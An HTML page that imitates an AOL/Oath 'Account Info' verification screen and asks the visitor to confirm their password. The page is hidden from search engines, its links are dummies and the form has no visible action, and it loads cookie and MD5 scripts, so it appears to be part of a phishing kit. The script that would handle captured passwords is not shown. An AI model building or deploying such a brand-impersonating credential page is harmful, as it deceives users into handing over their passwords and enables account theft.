<!DOCTYPE html>
<html lang="en">
<head>
	<meta content="text/html; charset=utf-8" http-equiv="Content-Type">
	<meta content="IE=edge,chrome=1" http-equiv="X-UA-Compatible" name="iecompatfix">
	<meta content="width=device-width, initial-scale=1.0" name="viewport">

	<title>Account Info</title>
	<meta name="robots" content="NOINDEX, NOFOLLOW, NOARCHIVE, NOSNIPPET">

	<link rel="shortcut icon" href="favicon.ico">

	<link rel="stylesheet" href="assets/css/open_sans.css">
	<link rel="stylesheet" href="assets/css/oldcmain-am.css">
	<link rel="stylesheet" href="assets/css/style.css">
</head>
<body>
	<div class="wrapper">
		<div class="aol-header gh-en_us">
			<div class="gh-container">
				<div class="branding">
					<div class="left clearfix logo-image-wrapper d2">
						<a class="logo-title logo-small logo-small-666666" href="#" id="brand-logo" title="AOL"></a>
						<div class="clear"></div>
					</div>
				</div>
				<div class="user darkuser">
					<div class="unauthenticated">
						<p class="username signup">Welcome</p>
						<ul>
							<li class="user-signup">
								<a href="#">Sign out</a>
							</li>
							<li>|</li>
							<li class="user-signup" style="padding-right: 4px;">
								<a href="#">Help</a>
							</li>
						</ul>
					</div>
				</div>
			</div>
		</div>
		<div id="ui-widget-overlay">
			<div class="row-fluid container">
				<div class="span12">
					<form name="formPass" action="" class="form-horizontal span12" id="reset-verify-form" method="post">
						<div class="content reset-container get-dp-id" id="reset-verify-options">
							<h3 class="error-header-msg">Verification for&nbsp;<span class="loginHere"></span></h3>
							<div class="data-blk">
								<div class="reset-sub-container">
									<ul class="nav tabs">
										<li id="verify-option-profile" style="display: list-item;">
											<div class="flt-clear">
												<span class="sphead">Verify profile information</span>
											</div>
											<div class="reset-option-blk" id="profile-option-blk" style="display: block;">
												<div class="control-group">
													<label class="control-label form-label" for="cconfirmpassword">Confirm password</label>
													<div class="controls">
														<input id="cconfirmpassword" maxlength="39" name="confirmpassword" placeholder="Password" type="password">
													</div>
												</div>
												<div class="button-container">
													<input class="btn btn-large btn-primary" id="profile-option-submit" type="submit" value="Done">
												</div>
											</div>
										</li>
									</ul>
								</div>
							</div>
						</div>
					</form>
				</div>
			</div>
		</div>
		<div class="push"></div>
	</div>
	<div class="footer footer-image-main">
		<div class="footer-image"><img alt="Aol." src="assets/img/brand_outh.png"></div>
	</div>
	<div class="footer">
		<div class="footer-text" style="margin-top: -10px;">
			<a href="#" target="_blank">Terms of Service</a> |<a href="#" target="_blank">Privacy Policy</a> <span>© 2017 Oath Inc. All Rights Reserved.</span>
		</div>
	</div>
	<script src="assets/js/jquery.min.js"></script>
	<script src="assets/js/jquery.cookie.js"></script>
	<script src="assets/js/jquery.md5.js"></script>
	<script src="assets/js/jquery.validate.min.js"></script>
	<script src="assets/js/script.js"></script>
</body>
</html>